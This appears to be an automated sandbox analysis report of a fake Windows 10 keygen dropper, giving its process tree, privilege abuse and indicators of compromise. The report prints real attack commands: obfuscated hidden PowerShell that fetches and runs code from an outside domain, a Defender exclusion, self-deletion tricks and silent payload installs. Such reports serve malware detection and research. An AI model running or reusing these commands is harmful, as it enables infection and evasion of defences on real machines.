672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 672 multitimer.exe 2164 file.exe 2164 file.exe 3916 CDB6.tmp.exe 3916 CDB6.tmp.exe 2164 file.exe 2164 file.exe 2164 file.exe 2164 file.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2624 -
Suspicious behavior: LoadsDriver 6 IoCs
Processes:
app.exesetup.exeDllHost.exesetup.exepid process 4128 app.exe 5916 setup.exe 6444 DllHost.exe 648 648 4568 setup.exe -
Suspicious behavior: MapViewOfSection 44 IoCs
Processes:
reg.exeprivacytools5.exeprivacytools5.exeexplorer.exeexplorer.exeexplorer.exeMicrosoftEdgeCP.exepid process 1140 reg.exe 1140 reg.exe 7404 privacytools5.exe 1420 privacytools5.exe 2624 2624 2624 2624 2624 2624 2624 2624 4272 explorer.exe 4272 explorer.exe 4272 explorer.exe 4272 explorer.exe 2624 2624 2624 2624 7068 explorer.exe 7068 explorer.exe 2624 2624 4272 explorer.exe 4272 explorer.exe 7068 explorer.exe 7068 explorer.exe 2624 2624 7920 explorer.exe 7920 explorer.exe 7068 explorer.exe 7068 explorer.exe 7920 explorer.exe 7920 explorer.exe 7920 explorer.exe 7920 explorer.exe 4272 explorer.exe 4272 explorer.exe 2624 2624 5608 MicrosoftEdgeCP.exe 5608 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
7577180.83pid process 6860 7577180.83 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exeaskinstall20.exemultitimer.exekey.exemultitimer.exedescription pid process Token: SeDebugPrivilege 584 taskkill.exe Token: SeCreateTokenPrivilege 2052 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2052 askinstall20.exe Token: SeLockMemoryPrivilege 2052 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2052 askinstall20.exe Token: SeMachineAccountPrivilege 2052 askinstall20.exe Token: SeTcbPrivilege 2052 askinstall20.exe Token: SeSecurityPrivilege 2052 askinstall20.exe Token: SeTakeOwnershipPrivilege 2052 askinstall20.exe Token: SeLoadDriverPrivilege 2052 askinstall20.exe Token: SeSystemProfilePrivilege 2052 askinstall20.exe Token: SeSystemtimePrivilege 2052 askinstall20.exe Token: SeProfSingleProcessPrivilege 2052 askinstall20.exe Token: SeIncBasePriorityPrivilege 2052 askinstall20.exe Token: SeCreatePagefilePrivilege 2052 askinstall20.exe Token: SeCreatePermanentPrivilege 2052 askinstall20.exe Token: SeBackupPrivilege 2052 askinstall20.exe Token: SeRestorePrivilege 2052 askinstall20.exe Token: SeShutdownPrivilege 2052 askinstall20.exe Token: SeDebugPrivilege 2052 askinstall20.exe Token: SeAuditPrivilege 2052 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2052 askinstall20.exe Token: SeChangeNotifyPrivilege 2052 askinstall20.exe Token: SeRemoteShutdownPrivilege 2052 askinstall20.exe Token: SeUndockPrivilege 2052 askinstall20.exe Token: SeSyncAgentPrivilege 2052 askinstall20.exe Token: SeEnableDelegationPrivilege 2052 askinstall20.exe Token: SeManageVolumePrivilege 2052 askinstall20.exe Token: SeImpersonatePrivilege 2052 askinstall20.exe Token: SeCreateGlobalPrivilege 2052 askinstall20.exe Token: 31 2052 askinstall20.exe Token: 32 2052 askinstall20.exe Token: 33 2052 askinstall20.exe Token: 34 2052 askinstall20.exe Token: 35 2052 askinstall20.exe Token: SeDebugPrivilege 584 taskkill.exe Token: SeDebugPrivilege 2924 multitimer.exe Token: SeImpersonatePrivilege 3136 key.exe Token: SeTcbPrivilege 3136 key.exe Token: SeChangeNotifyPrivilege 3136 key.exe Token: SeCreateTokenPrivilege 3136 key.exe Token: SeBackupPrivilege 3136 key.exe Token: SeRestorePrivilege 3136 key.exe Token: SeIncreaseQuotaPrivilege 3136 key.exe Token: SeAssignPrimaryTokenPrivilege 3136 key.exe Token: SeDebugPrivilege 672 multitimer.exe Token: SeImpersonatePrivilege 3136 key.exe Token: SeTcbPrivilege 3136 key.exe Token: SeChangeNotifyPrivilege 3136 key.exe Token: SeCreateTokenPrivilege 3136 key.exe Token: SeBackupPrivilege 3136 key.exe Token: SeRestorePrivilege 3136 key.exe Token: SeIncreaseQuotaPrivilege 3136 key.exe Token: SeAssignPrimaryTokenPrivilege 3136 key.exe Token: SeImpersonatePrivilege 3136 key.exe Token: SeTcbPrivilege 3136 key.exe Token: SeChangeNotifyPrivilege 3136 key.exe Token: SeCreateTokenPrivilege 3136 key.exe Token: SeBackupPrivilege 3136 key.exe Token: SeRestorePrivilege 3136 key.exe Token: SeIncreaseQuotaPrivilege 3136 key.exe Token: SeAssignPrimaryTokenPrivilege 3136 key.exe Token: SeImpersonatePrivilege 3136 key.exe Token: SeTcbPrivilege 3136 key.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Setup3310.tmpvpn.tmponaqkq5mwmg.tmpIBInstaller_97039.tmpvict.tmppid process 4524 Setup3310.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4544 onaqkq5mwmg.tmp 4904 IBInstaller_97039.tmp 4436 vict.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp 4576 vpn.tmp -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
vict.exeaskinstall24.exeloboydfybij.exeonaqkq5mwmg.exeSetup3310.exevpn.exevict.tmpSetup3310.tmponaqkq5mwmg.tmpvpn.tmpIBInstaller_97039.exeIBInstaller_97039.tmpapp.exewinlthst.exewimapi.exechrome_proxy.exe1rexm2eyd4t.exe1rexm2eyd4t.tmpSetup.exeSetup.tmpWerFault.exeMicrosoftEdge.exeXagdaNLKU.exeXagdaNLKU.exeGDZ4y6rzJ.exe7za.exeGDZ4y6rzJ.exeDelta.exeDelta.tmpSetup.exePictureLAb.exePictureLAb.tmpreg.exe7za.exeSetup.exeSetup.tmphjjgaa.exeprolab.exeprolab.tmpjfiag3g_gg.exetapinstall.exejfiag3g_gg.exegaooo.exejfiag3g_gg.exemd7_7dfj.exeaskinstall29.exejfiag3g_gg.execustomer4.exemain.exeprivacytools5.exesetup.exesetup.exesetups.exesetups.tmpmask_svc.exeConhost.exeparse.exeparse.exemask_svc.exe7za.exereg.exe7za.exevict.exepid process 4136 vict.exe 4144 askinstall24.exe 4208 loboydfybij.exe 4200 onaqkq5mwmg.exe 4348 Setup3310.exe 4420 vpn.exe 4436 vict.tmp 4524 Setup3310.tmp 4544 onaqkq5mwmg.tmp 4576 vpn.tmp 4848 IBInstaller_97039.exe 4904 IBInstaller_97039.tmp 4924 app.exe 5084 winlthst.exe 5104 wimapi.exe 4236 chrome_proxy.exe 4680 1rexm2eyd4t.exe 4668 1rexm2eyd4t.tmp 4140 Setup.exe 4844 Setup.tmp 5380 WerFault.exe 5256 MicrosoftEdge.exe 5628 XagdaNLKU.exe 5856 XagdaNLKU.exe 5896 GDZ4y6rzJ.exe 5864 7za.exe 5128 GDZ4y6rzJ.exe 5392 Delta.exe 5508 Delta.tmp 836 Setup.exe 4536 PictureLAb.exe 4388 PictureLAb.tmp 1140 reg.exe 5248 7za.exe 6080 Setup.exe 4920 Setup.tmp 5640 hjjgaa.exe 5196 prolab.exe 4888 prolab.tmp 4728 jfiag3g_gg.exe 1140 reg.exe 5632 tapinstall.exe 3176 jfiag3g_gg.exe 7616 gaooo.exe 7844 jfiag3g_gg.exe 4328 md7_7dfj.exe 6212 askinstall29.exe 6304 jfiag3g_gg.exe 4592 customer4.exe 6472 main.exe 7672 privacytools5.exe 5636 setup.exe 6960 setup.exe 6072 setups.exe 7040 setups.tmp 4804 mask_svc.exe 6456 Conhost.exe 1292 parse.exe 7612 parse.exe 5900 mask_svc.exe 6016 7za.exe 5672 reg.exe 7308 7za.exe 6492 vict.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.exekey.execmd.exetaskkill.exeaskinstall20.execmd.exemultitimer.exemultitimer.exefile.exedescription pid process target process PID 1232 wrote to memory of 3224 1232 Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe cmd.exe PID 1232 wrote to memory of 3224 1232 Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe cmd.exe PID 1232 wrote to memory of 3224 1232 Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe cmd.exe PID 3224 wrote to memory of 3660 3224 cmd.exe keygen-pr.exe PID 3224 wrote to memory of 3660 3224 cmd.exe keygen-pr.exe PID 3224 wrote to memory of 3660 3224 cmd.exe keygen-pr.exe PID 3224 wrote to memory of 1368 3224 cmd.exe keygen-step-1.exe PID 3224 wrote to memory of 1368 3224 cmd.exe keygen-step-1.exe PID 3224 wrote to memory of 1368 3224 cmd.exe keygen-step-1.exe PID 3224 wrote to memory of 832 3224 cmd.exe keygen-step-3.exe PID 3224 wrote to memory of 832 3224 cmd.exe keygen-step-3.exe PID 3224 wrote to memory of 832 3224 cmd.exe keygen-step-3.exe PID 3224 wrote to memory of 3932 3224 cmd.exe keygen-step-4.exe PID 3224 wrote to memory of 3932 3224 cmd.exe keygen-step-4.exe PID 3224 wrote to memory of 3932 3224 cmd.exe keygen-step-4.exe PID 3660 wrote to memory of 3136 3660 keygen-pr.exe key.exe PID 3660 wrote to memory of 3136 3660 keygen-pr.exe key.exe PID 3660 wrote to memory of 3136 3660 keygen-pr.exe key.exe PID 3932 wrote to memory of 584 3932 keygen-step-4.exe taskkill.exe PID 3932 wrote to memory of 584 3932 keygen-step-4.exe taskkill.exe PID 832 wrote to memory of 1096 832 keygen-step-3.exe cmd.exe PID 832 wrote to memory of 1096 832 keygen-step-3.exe cmd.exe PID 832 wrote to memory of 1096 832 keygen-step-3.exe cmd.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 3136 wrote to memory of 3996 3136 key.exe key.exe PID 1096 wrote to memory of 2124 1096 cmd.exe PING.EXE PID 1096 wrote to memory of 2124 1096 cmd.exe PING.EXE PID 1096 wrote to memory of 2124 1096 cmd.exe PING.EXE PID 584 wrote to memory of 2924 584 taskkill.exe multitimer.exe PID 584 wrote to memory of 2924 584 taskkill.exe multitimer.exe PID 3932 wrote to memory of 2052 3932 keygen-step-4.exe askinstall20.exe PID 3932 wrote to memory of 2052 3932 keygen-step-4.exe askinstall20.exe PID 3932 wrote to memory of 2052 3932 keygen-step-4.exe askinstall20.exe PID 2052 wrote to memory of 2652 2052 askinstall20.exe cmd.exe PID 2052 wrote to memory of 2652 2052 askinstall20.exe cmd.exe PID 2052 wrote to memory of 2652 2052 askinstall20.exe cmd.exe PID 2652 wrote to memory of 584 2652 cmd.exe taskkill.exe PID 2652 wrote to memory of 584 2652 cmd.exe taskkill.exe PID 2652 wrote to memory of 584 2652 cmd.exe taskkill.exe PID 3932 wrote to memory of 2164 3932 keygen-step-4.exe file.exe PID 3932 wrote to memory of 2164 3932 keygen-step-4.exe file.exe PID 3932 wrote to memory of 2164 3932 keygen-step-4.exe file.exe PID 2924 wrote to memory of 2084 2924 multitimer.exe multitimer.exe PID 2924 wrote to memory of 2084 2924 multitimer.exe multitimer.exe PID 2084 wrote to memory of 672 2084 multitimer.exe multitimer.exe PID 2084 wrote to memory of 672 2084 multitimer.exe multitimer.exe PID 2164 wrote to memory of 1636 2164 file.exe CDB6.tmp.exe PID 2164 wrote to memory of 1636 2164 file.exe CDB6.tmp.exe PID 2164 wrote to memory of 1636 2164 file.exe CDB6.tmp.exe PID 2164 wrote to memory of 1540 2164 file.exe CF6C.tmp.exe PID 2164 wrote to memory of 1540 2164 file.exe CF6C.tmp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:3996 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1368 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵PID:584
-
C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe" 1 3.1616095784.6053aa2870069 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe" 2 3.1616095784.6053aa28700697⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:672 -
C:\Users\Admin\AppData\Local\Temp\kkomqzwqf2s\vict.exe"C:\Users\Admin\AppData\Local\Temp\kkomqzwqf2s\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4136 -
C:\Users\Admin\AppData\Local\Temp\is-TFASG.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-TFASG.tmp\vict.tmp" /SL5="$50228,870426,780800,C:\Users\Admin\AppData\Local\Temp\kkomqzwqf2s\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4436 -
C:\Users\Admin\AppData\Local\Temp\is-B6VJ0.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-B6VJ0.tmp\wimapi.exe" 53510⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5104 -
C:\Users\Admin\AppData\Local\Temp\GDZ4y6rzJ.exe"C:\Users\Admin\AppData\Local\Temp\GDZ4y6rzJ.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5896 -
C:\Users\Admin\AppData\Local\Temp\GDZ4y6rzJ.exe"C:\Users\Admin\AppData\Local\Temp\GDZ4y6rzJ.exe"12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5128 -
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6272
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
- Blocklisted process makes network request
PID:5168 -
C:\Users\Admin\AppData\Local\Temp\gan1dn24kyp\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\gan1dn24kyp\askinstall24.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4144 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:4968
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:4748 -
C:\Users\Admin\AppData\Local\Temp\0kd5epl51hf\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\0kd5epl51hf\AwesomePoolU1.exe"8⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4160 -
C:\Users\Admin\AppData\Local\Temp\3eonopc13im\loboydfybij.exe"C:\Users\Admin\AppData\Local\Temp\3eonopc13im\loboydfybij.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4208 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 6489⤵
- Drops file in Windows directory
- Program crash
PID:4944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 6609⤵
- Program crash
PID:4632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 7729⤵
- Program crash
PID:4396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 8089⤵
- Program crash
PID:4988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 8809⤵
- Program crash
PID:4124 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 9569⤵
- Program crash
PID:2588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 10849⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5208 -
C:\Users\Admin\AppData\Local\Temp\45sh5hlfuno\onaqkq5mwmg.exe"C:\Users\Admin\AppData\Local\Temp\45sh5hlfuno\onaqkq5mwmg.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4200 -
C:\Users\Admin\AppData\Local\Temp\is-7K5MM.tmp\onaqkq5mwmg.tmp"C:\Users\Admin\AppData\Local\Temp\is-7K5MM.tmp\onaqkq5mwmg.tmp" /SL5="$201F6,870426,780800,C:\Users\Admin\AppData\Local\Temp\45sh5hlfuno\onaqkq5mwmg.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\is-CG8VD.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-CG8VD.tmp\winlthst.exe" test1 test110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5084 -
C:\Users\Admin\AppData\Local\Temp\XagdaNLKU.exe"C:\Users\Admin\AppData\Local\Temp\XagdaNLKU.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5628 -
C:\Users\Admin\AppData\Local\Temp\XagdaNLKU.exe"C:\Users\Admin\AppData\Local\Temp\XagdaNLKU.exe"12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5856 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 142413⤵
- Program crash
PID:5252 -
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6136
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
- Blocklisted process makes network request
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\mq3d0sd1er2\iohfq4l4pj4.exe"C:\Users\Admin\AppData\Local\Temp\mq3d0sd1er2\iohfq4l4pj4.exe" 57a764d042bf88⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\9OZ13L0AAW\9OZ13L0AA.exe" 57a764d042bf8 & exit9⤵PID:4700
-
C:\Program Files\9OZ13L0AAW\9OZ13L0AA.exe"C:\Program Files\9OZ13L0AAW\9OZ13L0AA.exe" 57a764d042bf810⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4812 -
C:\Users\Admin\AppData\Local\Temp\4bmjdtokj2y\lgnex2kjd01.exe"C:\Users\Admin\AppData\Local\Temp\4bmjdtokj2y\lgnex2kjd01.exe" testparams8⤵
- Executes dropped EXE
PID:4284 -
C:\Users\Admin\AppData\Roaming\eyk0e3kpjuc\1rexm2eyd4t.exe"C:\Users\Admin\AppData\Roaming\eyk0e3kpjuc\1rexm2eyd4t.exe" /VERYSILENT /p=testparams9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4680 -
C:\Users\Admin\AppData\Local\Temp\is-3CEA7.tmp\1rexm2eyd4t.tmp"C:\Users\Admin\AppData\Local\Temp\is-3CEA7.tmp\1rexm2eyd4t.tmp" /SL5="$701F0,549376,61440,C:\Users\Admin\AppData\Roaming\eyk0e3kpjuc\1rexm2eyd4t.exe" /VERYSILENT /p=testparams10⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4668 -
C:\Users\Admin\AppData\Local\Temp\q1l1hs0cwu0\vpn.exe"C:\Users\Admin\AppData\Local\Temp\q1l1hs0cwu0\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4420 -
C:\Users\Admin\AppData\Local\Temp\r4ww53u0lsj\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\r4ww53u0lsj\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4348 -
C:\Users\Admin\AppData\Local\Temp\g2e0hdmroik\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\g2e0hdmroik\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4848 -
C:\Users\Admin\AppData\Local\Temp\is-09N4U.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-09N4U.tmp\IBInstaller_97039.tmp" /SL5="$10366,14597143,721408,C:\Users\Admin\AppData\Local\Temp\g2e0hdmroik\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4904 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://janiboots.store/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
- Checks computer location settings
PID:5116 -
C:\Users\Admin\AppData\Local\Temp\is-95K0T.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-95K0T.tmp\{app}\chrome_proxy.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4236 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-95K0T.tmp\{app}\chrome_proxy.exe"11⤵PID:5952
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\p4ecib30zcp\app.exe"C:\Users\Admin\AppData\Local\Temp\p4ecib30zcp\app.exe" /8-238⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Still-Rain"9⤵PID:4664
-
C:\Program Files (x86)\Still-Rain\7za.exe"C:\Program Files (x86)\Still-Rain\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5864 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Still-Rain\app.exe" -map "C:\Program Files (x86)\Still-Rain\WinmonProcessMonitor.sys""9⤵PID:6064
-
C:\Program Files (x86)\Still-Rain\app.exe"C:\Program Files (x86)\Still-Rain\app.exe" -map "C:\Program Files (x86)\Still-Rain\WinmonProcessMonitor.sys"10⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:4128 -
C:\Program Files (x86)\Still-Rain\7za.exe"C:\Program Files (x86)\Still-Rain\7za.exe" e -p154.61.71.51 winamp.7z9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5248 -
C:\Program Files (x86)\Still-Rain\app.exe"C:\Program Files (x86)\Still-Rain\app.exe" /8-239⤵
- Executes dropped EXE
PID:3468 -
C:\Program Files (x86)\Still-Rain\app.exe"C:\Program Files (x86)\Still-Rain\app.exe" /8-2310⤵
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:7108 -
